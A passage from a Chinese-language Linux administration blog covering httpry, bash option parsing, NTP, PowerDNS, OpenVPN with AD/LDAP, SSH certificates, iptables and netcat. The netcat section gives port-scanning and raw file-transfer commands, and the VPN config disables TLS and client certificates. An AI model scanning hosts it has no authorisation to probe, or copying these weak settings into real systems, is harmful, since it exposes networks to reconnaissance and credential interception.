-c 只輸出到主控台，不建立檔案
-i 指定網路介面 grep 會接收 tcpflow 的輸出
-o 只顯示符合樣式的那一段
-E 表示樣式是延伸正則表示式（ERE）

httpry

https://github.com/jbittel/httpry.git

sudo httpry -i wlp0s20f3
httpry version 0.1.8 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2014 Jason Bittel <jason.bittel@gmail.com>
Starting capture on wlp0s20f3 interface
2022-06-22 16:38:12.166 192.168.1.24 172.217.17.238 > GET google.com / HTTP/1.1 - -
2022-06-22 16:38:12.199 172.217.17.238 192.168.1.24 < - - - HTTP/1.0 400 Bad Request
2022-06-22 16:38:23.090 192.168.1.24 172.217.17.238 > POST google.com / HTTP/1.1 - -
2022-06-22 16:38:23.163 172.217.17.238 192.168.1.24 < - - - HTTP/1.1 405 Method Not Allowed

在 Bash 中解析命令列參數

Tue, 07 Jun 2022 14:48:47 +0800

在 Bash 中解析命令列參數

getopts

getopts optstring opt [arg ...]

#!/bin/bash

while getopts 'abc:h' opt; do
 case "$opt" in
 a)
 echo "Processing option 'a'"
 ;;

 b)
 echo "Processing option 'b'"
 ;;

 c)
 arg="$OPTARG"
 echo "Processing option 'c' with '${OPTARG}' argument"
 ;;

 ?|h)
 echo "Usage: $(basename $0) [-a] [-b] [-c arg]"
 exit 1
 ;;
 esac
done
shift "$(( $OPTIND -1 ))"

optstring 代表支援的選項。若某個選項需要參數，則在它後面加冒號 (:)。例如選項 c 需要參數，會寫成 c:
當選項有關聯參數時，getopts 會將參數字串存到 OPTARG shell 變數中。例如 option c 的參數會存到 OPTARG。
opt 包含已解析的選項。

#!/bin/bash

while getopts ':abc:h' opt; do
 case "$opt" in
 a)
 echo "Processing option 'a'"
 ;;

 b)
 echo "Processing option 'b'"
 ;;

 c)
 arg="$OPTARG"
 echo "Processing option 'c' with '${OPTARG}' argument"
 ;;

 h)
 echo "Usage: $(basename $0) [-a] [-b] [-c arg]"
 exit 0
 ;;

 :)
 echo -e "option requires an argument.\nUsage: $(basename $0) [-a] [-b] [-c arg]"
 exit 1
 ;;

 ?)
 echo -e "Invalid command option.\nUsage: $(basename $0) [-a] [-b] [-c arg]"
 exit 1
 ;;
 esac
done
shift "$(( $OPTIND -1 ))"

注意我們也更新了 optstring，現在以冒號 (:) 開頭，會抑制預設的錯誤訊息。
當 OPTERR 變數設為 0 時，getopts 會停用錯誤訊息輸出。

使用 getopt 解析長選項

#!/bin/bash

VALID_ARGS=$(getopt -o abg:d: --long alpha,beta,gamma:,delta: -- "$@")
if [[ $? -ne 0 ]]; then
 exit 1;
fi

eval set -- "$VALID_ARGS"
while [ : ]; do
 case "$1" in
 -a | --alpha)
 echo "Processing 'alpha' option"
 shift
 ;;
 -b | --beta)
 echo "Processing 'beta' option"
 shift
 ;;
 -g | --gamma)
 echo "Processing 'gamma' option. Input argument is '$2'"
 shift 2
 ;;
 -d | --delta)
 echo "Processing 'delta' option. Input argument is '$2'"
 shift 2
 ;;
 --) shift;
 break
 ;;
 esac
done

-o 選項代表短選項
--long 選項代表長選項

Google Cloud Platform(GCP)：透過 Windows 遠端桌面存取 GCP 執行個體上的 Linux GUI

Wed, 20 Oct 2021 16:15:48 +0800

Google Cloud Platform(GCP)：透過 Windows 遠端桌面存取 GCP 執行個體上的 Linux GUI

# This will install GUI and make it as a default startup option and then restart the machine.
$ sudo yum install xrdp tigervnc-server

~# sudo su
~# passwd
~# systemctl enable --now xrdp

~# netstat -antup | grep xrdp
tcp 0 0 0.0.0.0:3389 0.0.0.0:* LISTEN 10202/xrdp
tcp 0 0 127.0.0.1:3350 0.0.0.0:* LISTEN 10201/xrdp-sesman

【筆記】在GCP上建立可Remote dekstop的Ubuntu環境

Wed, 20 Oct 2021 16:14:47 +0800

【筆記】在 GCP 上建立可 Remote dekstop 的 Ubuntu 環境

install

# dependency
sudo apt-get install ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal

# VNC Server
sudo apt-get install vnc4server

# 安裝完成後先執行vncserver，會先跳出password設定的選項
vncserver

modify `~/.vnc/xstartup`

#!/bin/sh

# Uncomment the following two lines for normal desktop:
# unset SESSION_MANAGER
# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
xsetroot -solid grey
vncconfig -iconic &
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &

gnome-panel &
gnome-settings-daemon &
metacity &
nautilus &

exec

# 殺掉目前執行的vncserver 然後重新執行
vncserver -kill :1
# vncserver預設是執行在port 5900上，如果在後面加上：1 就是5901以此類推
vncserver :1

設定 reboot 的時候自動執行 vncserver

@reboot /usr/bin/vncserver :1

SHELL编程之常用技巧

Wed, 22 Sep 2021 13:01:11 +0800

SSH 失敗錯誤：fatal: daemon() failed: No such device

Thu, 04 Mar 2021 18:48:39 +0800

SSH 失敗錯誤：fatal: daemon() failed: No such device

/var/log/secure

Oct 10 10:58:05 vps sshd[23799]: fatal: daemon() failed: No such device

# rm -vf /dev/null
removed `/dev/null`
-bash-3.2# mknod /dev/null c 1 3
Started SSH and the SSH started responding:

# service sshd restart
Stopping sshd: [ OK ]
Starting sshd: [ OK ]
-bash-3.2# service sshd status
openssh-daemon (pid 30608) is running…

CentOS 7 掛載 Synology NAS 資料夾

Mon, 09 Nov 2020 12:12:32 +0800

CentOS 7 掛載 Synology NAS 資料夾

如何設定時區與NTP服務在RHEL7/CentOS7

Tue, 29 Sep 2020 11:41:43 +0800

如何設定時區與 NTP 服務在 RHEL7/CentOS7

chrony 包含兩個程序，chronyd 是一個可以在啟動時啟動的守護進程，chronyc 是一個命令行界面程序，可用於監控 chronyd 的性能並在運行時更改各種運行參數。

注意 ntpd 和 chronyd 擇一就可，不要同時運作。

設定時區

~# timedatectl set-timezone Asia/Taipei
~# timedatectl
 Local time: Tue 2018-03-27 14:13:38 CST
 Universal time: Tue 2018-03-27 06:13:38 UTC
 RTC time: Tue 2018-03-27 06:13:40
 Time zone: Asia/Taipei (CST, +0800)
 NTP enabled: no
NTP synchronized: no
 RTC in local TZ: no
 DST active: n/a

設定 chronyd

# 安裝
~# yum install -y chrony

# 配置設定檔
~# cat /etc/chrony.conf
# Use public servers from the pool.ntp.org project.
# Please consider joining the pool (http://www.pool.ntp.org/join.html).
server 0.tw.pool.ntp.org iburst --->改成本地的伺服器
server 1.tw.pool.ntp.org iburst --->改成本地的伺服器
server 2.tw.pool.ntp.org iburst --->改成本地的伺服器
server 3.tw.pool.ntp.org iburst --->改成本地的伺服器

# 啟動服務和設為開機時啟動
~# systemctl enable chronyd
~# systemctl start chronyd

racking 參數顯示有關系統時間效能

~# chronyc tracking
Reference ID : 3DD8996B (61-216-153-107.hinet-ip.hinet.net) --->表示現在同步的時間伺服器，如果沒有id表示沒有同步
Stratum : 4 --->表示計算機有多少"跳hop" 表示本地的是第四層
Ref time (UTC) : Tue Mar 27 06:03:38 2018 --->最後一次測量的時間
System time : 0.000040356 seconds fast of NTP time --->調整系統時間
Last offset : +0.000163738 seconds
RMS offset : 0.000163738 seconds
Frequency : 21.384 ppm fast
Residual freq : +0.000 ppm
Skew : 675.319 ppm
Root delay : 0.008527911 seconds
Root dispersion : 0.066466033 seconds
Update interval : 2.0 seconds
Leap status : Normal --->Normal要顯示此值, Insert second, Delete second or Not synchronised.

~# chronyc sources -v
210 Number of sources = 4

 .-- Source mode '^' = server, '=' = peer, '#' = local clock.
 / .- Source state '*' = current synced, '+' = combined , '-' = not combined,
| / '?' = unreachable, 'x' = time may be in error, '~' = time too variable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \  | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 59-124-29-241.hinet-ip.h> 3 6 37 24 -1462us[-2363us] +/- 49ms
^+ 61-216-153-107.hinet-ip.> 3 6 37 23 -556us[ -556us] +/- 64ms
^? 59-125-122-217.hinet-ip.> 0 7 0 - +0ns[ +0ns] +/- 0ns
^- 61-216-153-105.hinet-ip.> 3 6 37 23 -280us[ -280us] +/- 64ms

看同步源頭的資訊

~# chronyc sourcestats -v
210 Number of sources = 4
 .- Number of sample points in measurement set.
 / .- Number of residual runs with same sign.
 | / .- Length of measurement set (time).
 | | / .- Est. clock freq error (ppm).
 | | | / .- Est. error in freq.
 | | | | / .- Est. offset.
 | | | | | | On the -.
 | | | | | | samples. \
 | | | | | | |
Name/IP Address NP NR Span Frequency Freq Skew Offset Std Dev
==============================================================================
59-124-29-241.hinet-ip.h> 6 5 135 -0.454 4.553 -784us 66us
61-216-153-107.hinet-ip.> 6 6 135 +4.455 19.761 +622us 247us
59-125-122-217.hinet-ip.> 0 0 0 +0.000 2000.000 +0ns 4000ms
61-216-153-105.hinet-ip.> 6 4 136 +8.965 42.440 +1250us 495us

將系統時間寫到硬體(主機板上的時間)上

~# hwclock --systohc
~# date ; hwclock
Tue Mar 27 14:07:57 CST 2018
Tue 27 Mar 2018 02:07:58 PM CST -0.938012 seconds

在 Ubuntu 22.04|20.04|18.04 安裝 PowerDNS 與 PowerDNS-Admin

Fri, 25 Sep 2020 09:38:17 +0800

安裝 PowerDNS

$ sudo apt update
$ sudo apt install mariadb-server -y

$ sudo mysql -u root

CREATE DATABASE powerdns;
GRANT ALL ON powerdns.* TO 'powerdns'@'localhost' IDENTIFIED BY 'Str0ngPasswOrd';
FLUSH PRIVILEGES;
USE powerdns;
CREATE TABLE domains (
 id INT AUTO_INCREMENT,
 name VARCHAR(255) NOT NULL,
 master VARCHAR(128) DEFAULT NULL,
 last_check INT DEFAULT NULL,
 type VARCHAR(6) NOT NULL,
 notified_serial INT UNSIGNED DEFAULT NULL,
 account VARCHAR(40) CHARACTER SET 'utf8' DEFAULT NULL,
 PRIMARY KEY (id)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE UNIQUE INDEX name_index ON domains(name);


CREATE TABLE records (
 id BIGINT AUTO_INCREMENT,
 domain_id INT DEFAULT NULL,
 name VARCHAR(255) DEFAULT NULL,
 type VARCHAR(10) DEFAULT NULL,
 content VARCHAR(64000) DEFAULT NULL,
 ttl INT DEFAULT NULL,
 prio INT DEFAULT NULL,
 change_date INT DEFAULT NULL,
 disabled TINYINT(1) DEFAULT 0,
 ordername VARCHAR(255) BINARY DEFAULT NULL,
 auth TINYINT(1) DEFAULT 1,
 PRIMARY KEY (id)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE INDEX nametype_index ON records(name,type);
CREATE INDEX domain_id ON records(domain_id);
CREATE INDEX ordername ON records (ordername);


CREATE TABLE supermasters (
 ip VARCHAR(64) NOT NULL,
 nameserver VARCHAR(255) NOT NULL,
 account VARCHAR(40) CHARACTER SET 'utf8' NOT NULL,
 PRIMARY KEY (ip, nameserver)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE TABLE comments (
 id INT AUTO_INCREMENT,
 domain_id INT NOT NULL,
 name VARCHAR(255) NOT NULL,
 type VARCHAR(10) NOT NULL,
 modified_at INT NOT NULL,
 account VARCHAR(40) CHARACTER SET 'utf8' DEFAULT NULL,
 comment TEXT CHARACTER SET 'utf8' NOT NULL,
 PRIMARY KEY (id)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE INDEX comments_name_type_idx ON comments (name, type);
CREATE INDEX comments_order_idx ON comments (domain_id, modified_at);


CREATE TABLE domainmetadata (
 id INT AUTO_INCREMENT,
 domain_id INT NOT NULL,
 kind VARCHAR(32),
 content TEXT,
 PRIMARY KEY (id)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE INDEX domainmetadata_idx ON domainmetadata (domain_id, kind);


CREATE TABLE cryptokeys (
 id INT AUTO_INCREMENT,
 domain_id INT NOT NULL,
 flags INT NOT NULL,
 active BOOL,
 content TEXT,
 PRIMARY KEY(id)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE INDEX domainidindex ON cryptokeys(domain_id);


CREATE TABLE tsigkeys (
 id INT AUTO_INCREMENT,
 name VARCHAR(255),
 algorithm VARCHAR(50),
 secret VARCHAR(255),
 PRIMARY KEY (id)
) Engine=InnoDB CHARACTER SET 'latin1';

CREATE UNIQUE INDEX namealgoindex ON tsigkeys(name, algorithm);

$ sudo systemctl disable systemd-resolved
$ sudo systemctl stop systemd-resolved

$ ls -lh /etc/resolv.conf
lrwxrwxrwx 1 root root 39 Jul 24 15:50 /etc/resolv.conf -> ../run/systemd/resolve/stub-resolv.conf
$ sudo unlink /etc/resolv.conf

$ echo "nameserver 8.8.8.8" | sudo tee /etc/resolv.conf

新增 Ubuntu 22.04|20.04|18.04 的 PowerDNS 官方套件庫。

Ubuntu 18.04 透過 netplan 設定網路卡 IP

Fri, 18 Sep 2020 13:00:05 +0800

Ubuntu 18.04 透過 netplan 設定網路卡 IP

照上面的說明看了一下 /etc/netplan 目錄，查閱一下 /etc/netplan/50-cloud-init.yaml，如下：

# This file is generated from information provided by
# the datasource. Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
 ethernets:
 ens192:
 dhcp4: true
 ens224:
 dhcp4: true
 version: 2

看來可以關閉 cloud network，但是我其實也沒有要用 cloud-init，乾脆移除它，如下：

sudo apt-get remove cloud-init

然後把 /etc/netplan/50-cloud-init.yaml 改成下面這樣：

# This file is generated from information provided by
# the datasource. Changes to it will not persist across an instance.
# To disable cloud-init's network configuration capabilities, write a file
# /etc/cloud/cloud.cfg.d/99-disable-network-config.cfg with the following:
# network: {config: disabled}
network:
 ethernets:
 ens192:
 addresses: [192.168.32.231/24]
 gateway4: 192.168.32.1
 nameservers:
 addresses: [8.8.8.8, 8.8.4.4]
 dhcp4: no
 ens224:
 dhcp4: true
 version: 2

這幾年 yaml 深得大眾的心，設定檔就是要用 yaml 格式才是潮，解說一下上述幾個設定：

openvpn部署之部署基於AD域認證

Thu, 17 Sep 2020 13:15:33 +0800

# 安裝openvpn
yum install openvpn -y
yum -y install openssl openssl-devel -y
yum -y install lzo lzo-devel -y
yum install -y libgcrypt libgpg-error libgcrypt-devel

# 安裝openvpn認證插件
yum install openvpn-auth-ldap -y

# 安裝easy-rsa
# 由於openvpn2.3之後，在openvpn裏面剔除了easy-rsa文件，所以需要單獨安裝
yum install easy-rsa
cp -rf /usr/share/easy-rsa/2.0 /etc/opevpn/

# 生成openvpn的key及證書
# 修改 `/opt/openvpn/etc/easy-rsa/2.0/vars` 參數
export KEY_COUNTRY="CN" # 國家
export KEY_PROVINCE="ZJ" # 省份
export KEY_CITY="NingBo" # 城市
export KEY_ORG="TEST-VPN" # 組織
exportKEY_EMAIL="81367070@qq.com" # 郵件
export KEY_OU="baidu" # 單位

source vars
./clean-all
./build-ca
./build-dh
./build-key-server server
./build-key client1


# 編輯openvpn服務端配置文件：`/etc/openvpn/server.conf`
port 1194
proto udp
dev tun
ca keys/ca.crt
cert keys/server.crt
key keys/server.key # This file should be kept secret
dh keys/dh2048.pem
server 10.8.0.0 255.255.255.0 //客戶端分配的ip地址
push "route 192.168.1.0 255.255.255.0" //推送客戶端的路由
push "redirect-gateway" //修改客戶端的網關，使其直接走vpn流量
ifconfig-pool-persist ipp.txt
keepalive 10 120
comp-lzo
persist-key
persist-tun
status openvpn-status.log
verb 3
plugin /usr/lib64/openvpn/plugin/lib/openvpn-auth-ldap.so "/etc/openvpn/auth/ldap.conf"
client-cert-not-required
username-as-common-name
log /var/log/openvpn.log


# 修改openvpn-ldap-auth的配置文件 `/etc/openvpn/auth/ldap.conf`
# /etc/openvpn/auth/ldap.conf

<LDAP>
 # LDAP server URL
 # 更改爲 AD 服務器的 IP
 URL ldap://172.16.76.238:389

 # Bind DN (If your LDAP server doesn't support anonymous binds)
 # BindDN uid=Manager,ou=People,dc=example,dc=com
 # 更改爲域管理的 DN, 可以通過 ldapsearch 進行查詢
 # -h 的 ip 替換爲服務器 ip，-D 換爲管理員的 dn，-b 爲基礎的查詢 dn，* 爲所有
 # ldapsearch -LLL -x -h 172.16.76.238 -D "administrator@xx.com" -W -b "dc=xx,dc=com" "*"
 BindDN "cn=administrator,cn=Users,dc=xx,dc=com"

 # Bind Password
 # Password SecretPassword
 # 域管理員的密碼
 Password passwd

 # Network timeout (in seconds)
 Timeout 15

 # Enable Start TLS
 TLSEnable no

 # Follow LDAP Referrals (anonymously)
 FollowReferrals no

 # TLS CA Certificate File
 # TLSCACertFile /usr/local/etc/ssl/ca.pem

 # TLS CA Certificate Directory
 # TLSCACertDir /etc/ssl/certs

 # Client Certificate and key
 # If TLS client authentication is required
 # TLSCertFile /usr/local/etc/ssl/client-cert.pem
 # TLSKeyFile /usr/local/etc/ssl/client-key.pem

 # Cipher Suite
 # The defaults are usually fine here
 # TLSCipherSuite ALL:!ADH:@STRENGTH
</LDAP>

<Authorization>
 # Base DN
 # 查詢認證的基礎 dn
 BaseDN "dc=boqii-inc,dc=com"

 # User Search Filter
 # SearchFilter "(&(uid=%u)(accountStatus=active))"
 # 其中 sAMAccountName=%u 的意思是把 sAMAccountName 的字段取值爲用戶名，
 # 後面 "memberof=CN=myvpn,DC=xx,DC=com" 指向要認證的 vpn 用戶組，
 # 這樣任何用戶使用 vpn，只要加入這個組就好了
 SearchFilter "(&(sAMAccountName=%u)(memberof=CN=myvpn,DC=boqii-inc,DC=com))"

 # Require Group Membership
 RequireGroup false

 # Add non-group members to a PF table (disabled)
 # PFTable ips_vpn_users

 <Group>
 # BaseDN "ou=Groups,dc=example,dc=com"
 # SearchFilter "(|(cn=developers)(cn=artists))"
 # MemberAttribute uniqueMember
 # Add group members to a PF table (disabled)
 # PFTable ips_vpn_eng

 BaseDN "ou=vpn,dc=boqii-inc,dc=com"
 SearchFilter "(cn=openvpn)"
 MemberAttribute "member"
 </Group>
</Authorization>

拷貝/etc/openvpn/key目錄下的ca.crt證書，以備客戶端使用。

确定虚拟化技术的简便方法

Wed, 29 Jul 2020 21:11:45 +0800

确定虚拟化技术的简便方法

`dmidecode -s system-product-name`

虚拟化技术

VMware 工作站

root@router:~# dmidecode -s system-product-name
VMware Virtual Platform

虚拟盒子

root@router:~# dmidecode -s system-product-name
VirtualBox

Qemu 与 KVM

root@router:~# dmidecode -s system-product-name
KVM

Qemu（模拟）

root@router:~# dmidecode -s system-product-name
Bochs

Microsoft 虚拟 PC

root@router:~# dmidecode | egrep -i 'manufacturer|product'
Manufacturer: Microsoft Corporation
Product Name: Virtual Machine

维尔图佐

root@router:~# dmidecode
/dev/mem: Permission denied

en

root@router:~# dmidecode | grep -i domU
Product Name: HVM domU

`/dev/disk/by-id`

如果您没有 dmidecode 运行权，则可以使用： ls -1 /dev/disk/by-id/

SSH 证书登录教程

Wed, 08 Jul 2020 13:39:48 +0800

SSH 证书登录教程

证书登录的流程

SSH 证书登录之前，如果还没有证书，需要生成证书。具体方法是：

用户和服务器都将自己的公钥，发给 CA
CA 使用服务器公钥，生成服务器证书，发给服务器
CA 使用用户的公钥，生成用户证书，发给用户。

有了证书以后，用户就可以登录服务器了。整个过程都是 SSH 自动处理，用户无感知。

用户登录服务器时，SSH 自动将用户证书发给服务器。
服务器检查用户证书是否有效，以及是否由可信的 CA 颁发。
SSH 自动将服务器证书发给用户。
用户检查服务器证书是否有效，以及是否由信任的 CA 颁发。
双方建立连接，服务器允许用户登录。

生成 CA 的密钥

虽然 CA 可以用同一对密码签发用户证书和服务器证书，但是出于安全性和灵活性，最好用不同的密钥分别签发。所以，CA 至少需要两对密钥，一对是签发用户证书的密钥，假设叫做 user_ca，另一对是签发服务器证书的密钥，假设叫做 host_ca。

# 生成 CA 签发用户证书的密钥
# 会在~/.ssh目录生成一对密钥：user_ca（私钥）和user_ca.pub（公钥）
# 各个参数含义如下
# -t rsa：指定密钥算法 RSA。
# -b 4096：指定密钥的位数是4096位。安全性要求不高的场合，这个值可以小一点，但是不应小于1024。
# -f ~/.ssh/user_ca：指定生成密钥的位置和文件名。
# -C user_ca：指定密钥的识别字符串，相当于注释，可以随意设置。
$ ssh-keygen -t rsa -b 4096 -f ~/.ssh/user_ca -C user_ca


# 生成 CA 签发服务器证书的密钥
# 会在~/.ssh目录生成一对密钥：host_ca（私钥）和host_ca.pub（公钥）
# 现在，~/.ssh目录应该至少有四把密钥。
# - ~/.ssh/user_ca
# - ~/.ssh/user_ca.pub
# - ~/.ssh/host_ca
# - ~/.ssh/host_ca.pub
$ ssh-keygen -t rsa -b 4096 -f host_ca -C host_ca

服务器安装 CA 公钥

# 为了让服务器信任用户证书，必须将 CA 签发用户证书的公钥`user_ca.pub`，拷贝到服务器
$ scp ~/.ssh/user_ca.pub root@host.example.com:/etc/ssh/

然后，将下面一行添加到服务器配置文件 `/etc/ssh/sshd_config`

TrustedUserCAKeys /etc/ssh/user_ca.pub

上面的做法是将user_ca.pub加到/etc/ssh/sshd_config，这会产生全局效果，即服务器的所有账户都会信任user_ca签发的所有用户证书。

活久见！Linux命令行居然也可以用来查看图像？

Tue, 14 Apr 2020 22:01:02 +0800

活久见！Linux 命令行居然也可以用来查看图像？

FIM

sudo apt-get install fim

控制 FIM 中图像的常用快捷键：

PageUp / Down：上一个图像/下一个图像
+/-：放大/缩小
a：自动缩放
w：合适宽度
h：合适身高
j / k：向下平移/向上平移
f / m：翻转/镜面反射
r / R：旋转（顺时针和逆时针）
ESC / q：退出

Viu

cargo install viu

Lsix

sudo apt-get install imagemagick

wget https://github.com/hackerb9/lsix/archive/master.zip

用 iptables 和 ip rule 做負載均衡

Wed, 04 Dec 2019 11:08:04 +0800

用 iptables 和 ip rule 做負載均衡

操作

這裡以一台透過有線 + 無線出口連線到網際網路的 Arch Linux 裝置為例。共有兩個出口，分別使用網卡 eth0 和 eth1。大致對應關係如下：

標記 10 (0xa) - 路由表 #110 - 使用 eth0 出口
標記 11 (0xb) - 路由表 #111 - 使用 eth1 出口

我們會根據封包上的標記值判斷它應該走哪個出口。首先，使用 ip rule 為每個標記值指定一張路由表。

通常預設路由表的權重是 32768。為了讓我們的路由表生效，需要將權重調高一些（例如 31000）。

# 讓帶標記 10 (0xa) 的封包使用 110 號路由表，權重 31000
ip rule add fwmark 10 table 110 prio 31000
# 讓帶標記 11 (0xb) 的封包使用 111 號路由表，權重 31000
ip rule add fwmark 11 table 111 prio 31000
# 如果你的連線更多，可以繼續新增標記 <-> 路由表的對應關係

# #110 路由表的路由
ip route add 10.20.0.0/24 dev eth0 table 110
ip route add default via 10.20.0.254 table 110
# #111 路由表的路由
ip route add 10.25.0.0/24 dev eth1 table 111
ip route add default via 10.25.0.254 table 111


# 如果這條連線已經被標記，將標記設定到封包上
iptables -t mangle -A OUTPUT -j CONNMARK --restore-mark
# 如果封包已經有標記，直接放行
iptables -t mangle -A OUTPUT -m mark ! --mark 0 -j ACCEPT
# 如果封包沒有被標記
# 把封包標記為 10 (0xa)
iptables -t mangle -A OUTPUT -j MARK --set-mark 10
# 每 2 個封包就把一個封包標記為 11 (0xb)
iptables -t mangle -A OUTPUT -m statistic --mode nth --every 2 --packet 0 -j MARK --set-mark 11

# 如果你有三條出口，這裡可以類似於
# iptables -t mangle -A OUTPUT -j MARK --set-mark 10
# iptables -t mangle -A OUTPUT -m statistic --mode nth --every 3 --packet 0 -j MARK --set-mark 11
# iptables -t mangle -A OUTPUT -m statistic --mode nth --every 3 --packet 1 -j MARK --set-mark 12

# 把封包的標記儲存到整條連線上，讓整個連線使用同一個出口
iptables -t mangle -A OUTPUT -j CONNMARK --save-mark

# 讓封包的出口與我們選擇的一致
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE

之後可以用 iptables -L OUTPUT -t mangle 看一下規則是否正確，再用 Wireshark 驗證連線是否真的分流。

再戰營運商快取：使用 iptables 對付快取劫持

Mon, 07 Oct 2019 10:41:08 +0800

再戰營運商快取：使用 iptables 對付快取劫持

起因

與移動的快取問題進行鬥爭要追溯到兩年前，那時因為移動竟然連 cnpm 的資料都進行快取。更離譜的是：移動的快取伺服器不但速度慢到堪比萬年王八跑馬拉松，還經常當機，導致我只想安安靜靜寫程式卻不得不面對一片鮮紅的報錯。

解決

iptables -I FORWARD -p tcp -m tcp -m ttl --ttl-gt 20 -m ttl --ttl-lt 30 -j DROP

考慮到可能還真的有其他伺服器送來的正常封包 TTL 也在 20-30 的區間，應該再加一層判斷。對比移動的 302 劫持封包和正常的 302 跳轉封包後，發現移動的劫持封包狀態位包含 FIN、PSH、ACK，而正常的 302 跳轉封包通常不會這三個都有。

因此在 iptables 規則中加入是否包含 FIN、PSH、ACK 的判斷：

iptables -I FORWARD -p tcp -m tcp -m ttl --ttl-gt 20 -m ttl --ttl-lt 30 --tcp-flags ALL FIN,PSH,ACK -j DROP

這樣應能在丟棄劫持封包的同時，盡可能降低誤傷正常封包的可能性。

Linux 磁碟空間未釋放的解決方法

Wed, 10 Jul 2019 09:57:33 +0800

Linux 磁碟空間未釋放的解決方法

使用 `df -ah` 命令 `du -h --max-depth=1`

du 的總和遠小於 df 得到的總量。

程式使用的檔案資源被刪除後，程式仍在執行，導致檔案未真正刪除，無法釋放磁碟空間，也無法被統計到。

lsof |grep delete

Linux CentOS 7 安裝字體庫 & 中文本體

Tue, 18 Dec 2018 22:13:40 +0800

Linux CentOS 7 安裝字體庫 & 中文本體

yum -y install fontconfig

這時在 /usr/shared 目錄就可以看到 fonts 和 fontconfig 目錄了（之前是沒有的）

在這之前我們還需要新建目錄，首先在 /usr/shared/fonts 目錄下新建一個目錄 chinese

mkdir /usr/shared/fonts/chinese

只需要將我們需要的字體拷貝出來並上傳至 linux 服務器 /usr/shared/fonts/chinese 目錄下即可，在這裏我選擇宋體和黑體（報表中用到了這兩種字體），可以看到是兩個後綴名為 ttf 和 ttc 的文檔

chmod -R 755 /usr/share/fonts/chinese

接下來需要安裝 ttmkfdir 來搜索目錄中所有的字體信息，並彙總生成 fonts.scale 文檔


yum -y install ttmkfdir

ttmkfdir -e /usr/share/X11/fonts/encodings/encodings.dir

vi /etc/fonts/fonts.conf

<dir>/usr/shared/fonts/chinese<dir>

刷新內存中的字體緩存

fc-cache

auth.log 中 sshd 這行的 SHA256 是什麼？

Mon, 17 Dec 2018 16:11:43 +0800

auth.log 中 sshd 這行的 SHA256 是什麼？

ssh-keygen -lf .ssh/id_rsa.pub

cat .ssh/id_rsa.pub |
 awk '{ print $2 }' | # 只取實際的 key 資料，不含前綴或註解
 base64 -d | # 以 base64 解碼
 sha256sum | # SHA256 雜湊（回傳十六進位）
 awk '{ print $1 }' | # 只取十六進位資料
 xxd -r -p | # 十六進位轉位元組
 base64 # 以 base64 編碼

Netcat（Linux nc 指令）網路管理者工具實用範例

Fri, 09 Nov 2018 00:17:47 +0800

Netcat（Linux nc 指令）網路管理者工具實用範例

傳送測試用的 UDP 封包到遠端伺服器

下面這行指令會傳送 UDP 的測試封包到指定的機器與連接埠，-w1 參數是指定 timeout 的時間為 1 秒。

echo -n "foo" | nc -u -w1 192.168.1.8 5000

開啟 UDP 連接埠接收資料

nc -lu localhost 5000

遠端機器的連接埠掃描（Port Scanning）

這行指令會掃描指定機器 1 ~ 1000 與 2000 ~ 3000 這兩個範圍的 TCP 連接埠，看看哪些埠號有開啟。

nc -vnz -w 1 192.168.233.208 1-1000 2000-3000

這行則是掃描 UDP 的連接埠

nc -vnzu 192.168.1.8 1-65535

在兩台主機之間複製檔案

假設現在有兩台主機，分別為 A 主機與 B 主機，若要將一個檔案從 A 主機複製到 B 主機，可以先在 B 主機（檔案接收者）上執行：

nc -l 5000 > my.jpg

使用 TC 和 Netem 模拟网络异常

Sat, 15 Sep 2018 16:17:26 +0800

使用 TC 和 Netem 模拟网络异常

Netem 与 TC 简要说明

Netem 是 Linux 2.6 及以上内核版本提供的一个网络模拟功能模块。该功能模块可以用来在性能良好的局域网中，模拟出复杂的互联网传输性能。例如:低带宽、传输延迟、丢包等等情况。使用 Linux 2.6 (或以上) 版本内核的很多 Linux 发行版都默认开启了该内核模块，比如：Fedora、Ubuntu、Redhat、OpenSuse、CentOS、Debian 等等。

TC 是 Linux 系统中的一个用户态工具，全名为 Traffic Control (流量控制)。TC 可以用来控制 Netem 模块的工作模式，也就是说如果想使用 Netem 需要至少两个条件，一是内核中的 Netem 模块被启用，另一个是要有对应的用户态工具 TC 。

所有的报文延迟 100ms 发送: $ tc qdisc add dev enp0s5 root netem delay 100ms
模拟丢包率: $ tc qdisc change dev enp0s5 root netem loss 50%
模拟包重复: $ tc qdisc change dev enp0s5 root netem duplicate 50%
模拟包损坏: tc qdisc change dev enp0s5 root netem corrupt 2%
模拟包乱序(每 5 个报文（第 5、10、15…报文）会正常发送，其他的报文延迟 100ms): tc qdisc change dev enp0s5 root netem reorder 50% gap 3 delay 100ms

查看并显示 enp0s5 网卡的相关传输配置

$ tc qdisc show dev enp0s5

Quagga Routing - 安裝、設定與建置 BGP

Tue, 14 Aug 2018 22:13:12 +0800

Quagga Routing - 安裝、設定與建置 BGP

Systemd 入门教程：实战篇

Thu, 09 Aug 2018 13:53:32 +0800

Systemd 入门教程：实战篇

$ systemctl cat sshd.service

[Unit]
Description=OpenSSH server daemon
Documentation=man:sshd(8) man:sshd_config(5)
After=network.target sshd-keygen.service
Wants=sshd-keygen.service

[Service]
EnvironmentFile=/etc/sysconfig/sshd
ExecStart=/usr/sbin/sshd -D $OPTIONS
ExecReload=/bin/kill -HUP $MAINPID
Type=simple
KillMode=process
Restart=on-failure
RestartSec=42s

[Install]
WantedBy=multi-user.target

